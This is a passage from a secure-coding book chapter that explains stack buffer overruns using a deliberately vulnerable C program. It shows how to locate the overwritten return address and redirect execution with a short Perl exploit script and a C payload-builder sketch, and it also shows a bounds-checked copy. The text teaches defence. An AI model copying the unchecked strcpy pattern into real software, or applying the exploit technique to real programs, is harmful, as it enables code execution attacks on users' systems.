Static Buffer Overruns | Writing Secure Code, Second Edition

Static Buffer Overruns

A static buffer overrun occurs when a buffer declared on the stack is overwritten by copying data larger than the buffer. Variables declared on the stack are located next to the return address for the function's caller. The usual culprit is unchecked user input passed to a function such as strcpy, and the result is that the return address for the function gets overwritten by an address chosen by the attacker. In a normal attack, the attacker can get a program with a buffer overrun to do something the attacker considers useful, such as binding a command shell to a port of the attacker's choice. The attacker often has to overcome some interesting problems, such as the fact that the user input isn't completely unchecked or that only a limited number of characters will fit in the buffer. If you're working with double-byte character sets, the hacker might have to work harder, but the problems this introduces aren't insurmountable. If you're the type of programmer who enjoys arcane puzzles (the classic definition of a hacker), exploiting a buffer overrun can be an interesting exercise. (If you succeed, please keep it to yourself and behave responsibly with your information.) This particular intricacy is beyond the scope of this book, so I'll use a program written in C to show a simple exploit of an overrun. Let's take a look at the code:

/*
  This program shows an example of how a static buffer overrun
  can be used to execute arbitrary code. Its objective is to find
  an input string that executes the function bar.
*/

#include <stdio.h>
#include <string.h>

void foo(const char* input)
{
    char buf[10];

    //What? No extra arguments supplied to printf?
    //It's a cheap trick to view the stack 8-)
    //We'll see this trick again when we look at format strings.
    printf("My stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n\n");

    //Pass the user input straight to secure code public enemy #1.
    strcpy(buf, input);
    printf("%s\n", buf);

    printf("Now the stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n\n");
}

void bar(void)
{
    printf("Augh! I've been hacked!\n");
}

int main(int argc, char* argv[])
{
    //Blatant cheating to make life easier on myself
    printf("Address of foo = %p\n", foo);
    printf("Address of bar = %p\n", bar);
    foo(argv[1]);
    return 0;
}

This application is nearly as simple as "Hello, World." I start off doing a little cheating and printing the addresses of my two functions, foo and bar, by using the printf function's %p option, which displays an address. If I were hacking a real application, I'd probably try to jump back into the static buffer declared in foo or find a useful function loaded from a system dynamic-link library (DLL). The objective of this exercise is to get the bar function to execute. The foo function contains a pair of printf statements that use a side effect of variable-argument functions to print the values on the stack. The real problem occurs when the foo function blindly accepts user input and copies it into a 10-byte buffer.
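For contrast, here is a minimal sketch of what checking the input before the copy might look like. The helper name copy_checked and its return convention are hypothetical and not part of the sample program; the sketch assumes the caller knows the size of the destination buffer and is willing to reject oversized input rather than truncate it.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: copy src into dst only if it fits, terminator
   included. Returns 0 on success and -1 if src is NULL or too long.
   On failure dst is left as an empty string. */
int copy_checked(char *dst, size_t dst_size, const char *src)
{
    size_t len;

    if (dst == NULL || dst_size == 0) {
        return -1;              /* nowhere to copy to */
    }
    dst[0] = '\0';
    if (src == NULL) {
        return -1;              /* e.g. argv[1] when no argument is given */
    }
    len = strlen(src);
    if (len >= dst_size) {
        return -1;              /* would overrun the buffer: reject */
    }
    memcpy(dst, src, len + 1);  /* len + 1 copies the terminating NUL */
    return 0;
}
```

With a 10-byte buffer, an argument such as Hello is accepted, while anything of 10 characters or more is rejected before a single byte is written.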

The best way to follow along is to compile the application from the command line to produce a release executable. Don't just load it into Microsoft Visual C++ and run it in debug mode: the debug version contains checks for stack problems, and it won't demonstrate the problem properly. However, you can load the application into Visual C++ and run it in release mode. Let's take a look at some output after providing a string as the command line argument:

[d:\]StaticOverrun.exe Hello
Address of foo = 00401000
Address of bar = 00401045
My stack looks like:
00000000
00000000
7FFDF000
0012FF80
0040108A <-- We want to overwrite the return address for foo.
00410EDE

Hello
Now the stack looks like:
6C6C6548 <-- You can see where "Hello" was copied in.
0000006F
7FFDF000
0012FF80
0040108A
00410EDE
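The first two words of the second dump are the input string itself. On a little-endian machine such as x86, the first character of the string lands in the low-order byte of each 32-bit word, which is why "Hello" shows up as 6C6C6548 followed by 0000006F. A minimal sketch of that decoding, assuming 32-bit words as in the output above (word_to_memory_order is a hypothetical helper name, not part of the sample program):

```c
#include <stdint.h>

/* Hypothetical helper: unpack a 32-bit value, as printed by %p in the
   dumps, into the four bytes it occupies in memory on a little-endian
   machine. out must have room for 5 chars; it is NUL-terminated. */
void word_to_memory_order(uint32_t word, char out[5])
{
    int i;

    for (i = 0; i < 4; i++) {
        /* Byte 0 is the least significant byte of the word. */
        out[i] = (char)((word >> (8 * i)) & 0xFF);
    }
    out[4] = '\0';
}
```

Passing 0x6C6C6548 yields the characters H, e, l, l, and passing 0x0000006F yields o followed by zero bytes. The same reading applies to any overwritten word in a stack dump.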

Now for the classic test for buffer overruns, a long input string:

[d:\]StaticOverrun.exe AAAAAAAAAAAAAAAAAAAAAAAA
Address of foo = 00401000
Address of bar = 00401045
My stack looks like:
00000000
00000000
7FFDF000
0012FF80
0040108A
00410ECE

AAAAAAAAAAAAAAAAAAAAAAAA
Now the stack looks like:
41414141
41414141
41414141
41414141
41414141
41414141

And we get the application error message claiming the instruction at 0x41414141 tried to access memory at address 0x41414141, as shown in Figure 3-1.

Figure 3-1. Application error message generated after the static buffer overrun occurs.

Note that if you don't have a development environment on your system, this information will be in the Dr. Watson logs. A quick look at the ASCII charts shows that the code for the letter A is 0x41. This result is proof that our application is exploitable.

Warning! Just because you can't figure out a way to get this result does not mean that the overrun isn't exploitable. It means that you haven't worked on it long enough. Except in a few trivial cases, it generally isn't possible to prove that a buffer overrun isn't exploitable. You can prove only that something is exploitable, so any given buffer overrun either is exploitable or might be exploitable. In other words, even if you can't prove that an overrun is exploitable, always assume that it is. If you tell the public that the buffer overrun in your application isn't exploitable, odds are someone will find a way to prove that it is exploitable just to embarrass you. Or worse, that person might find the exploit and inform only criminals. Now you've misled your users to think the patch to fix the overrun isn't a high priority, and there's an active nonpublic exploit being used to attack your customers.

Let's take a look at how we find which characters to feed the application. Try this:

[d:\]StaticOverrun.exe ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Address of foo = 00401000
Address of bar = 00401045
My stack looks like:
00000000
00000000
7FFDF000
0012FF80
0040108A
00410EBE

ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Now the stack looks like:
44434241
48474645
4C4B4A49
504F4E4D
54535251
58575655

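The application error message now shows that we're trying to execute instructions at 0x54535251. Glancing again at our ASCII charts, we see that 0x54 is the code for the letter T, so that's what we'd like to modify. The bytes appear in reverse order because x86 is little-endian: the return address was overwritten by the characters QRST, with Q as the low-order byte. Let's now try this: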

[d:\]StaticOverrun.exe ABCDEFGHIJKLMNOPQRS
Address of foo = 00401000
Address of bar = 00401045
My stack looks like:
00000000
00000000
7FFDF000
0012FF80
0040108A
00410ECE

ABCDEFGHIJKLMNOPQRS
Now the stack looks like:
44434241
48474645
4C4B4A49
504F4E4D
00535251
00410ECE

Now we're getting somewhere! By changing the user input, we're able to manipulate where the program tries to execute the next instruction. Clearly, if we could send it 0x45, 0x10, 0x40 instead of QRS, we could get bar to execute. So how do you pass these odd characters (0x10 isn't printable) on the command line? Like any good hacker, I'll use the following Perl script named HackOverrun.pl to easily send the application an arbitrary command line:

$arg = "ABCDEFGHIJKLMNOP"."\x45\x10\x40";
$cmd = "StaticOverrun ".$arg;
system($cmd);

Running this script produces the desired result:

[d:\devstudio\myprojects\staticoverrun]perl HackOverrun.pl
Address of foo = 00401000
Address of bar = 00401045
My stack looks like:
77FB80DB
77F94E68
7FFDF000
0012FF80
0040108A
00410ECA

ABCDEFGHIJKLMNOPE?@
Now the stack looks like:
44434241
48474645
4C4B4A49
504F4E4D
00401045
00410ECA

Augh! I've been hacked!

That was easy, wasn't it? Looks like something even a junior programmer could have done. In a real attack, we'd fill the first 16 characters with assembly code designed to do ghastly things to the victim and set the return address to the start of the buffer. Think about how easy this is to exploit next time you're working with user input.
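The argument that HackOverrun.pl builds can also be sketched in C. The layout is read off the dumps above: the return address is the fifth word printed, so 16 filler bytes precede it, and the terminating NUL that strcpy copies supplies the high-order 00 byte. The name build_argument and its parameters are hypothetical; the sketch assumes a little-endian 32-bit target and an address whose bytes below the top nonzero byte are all nonzero, because a zero byte would end the string early.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: write `pad` filler letters followed by the
   nonzero low-order bytes of `addr`, lowest byte first, then a NUL.
   Returns the string length, or 0 if out is too small or addr has an
   embedded zero byte that cannot be passed inside a C string. */
size_t build_argument(char *out, size_t out_size, size_t pad, uint32_t addr)
{
    size_t n = 0;
    size_t i;

    if (out == NULL || out_size < pad + 5) {
        return 0;               /* need pad + up to 4 bytes + NUL */
    }
    for (i = 0; i < pad; i++) {
        out[n++] = (char)('A' + (i % 26));   /* ABCDEFGHIJKLMNOP... */
    }
    while (addr != 0) {
        unsigned char byte = (unsigned char)(addr & 0xFF);
        if (byte == 0) {
            out[0] = '\0';
            return 0;           /* embedded zero would truncate the string */
        }
        out[n++] = (char)byte;
        addr >>= 8;
    }
    out[n] = '\0';
    return n;
}
```

Called with a pad of 16 and the address 0x00401045 printed for bar, this produces the same 19 bytes as the Perl string: the letters A through P followed by 0x45, 0x10, 0x40.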


The 64-bit Intel Itanium does not push the return address on the stack; rather, the return address is held in a register. This does not mean the processor is not susceptible to buffer overruns. It's just more difficult to make the overrun exploitable.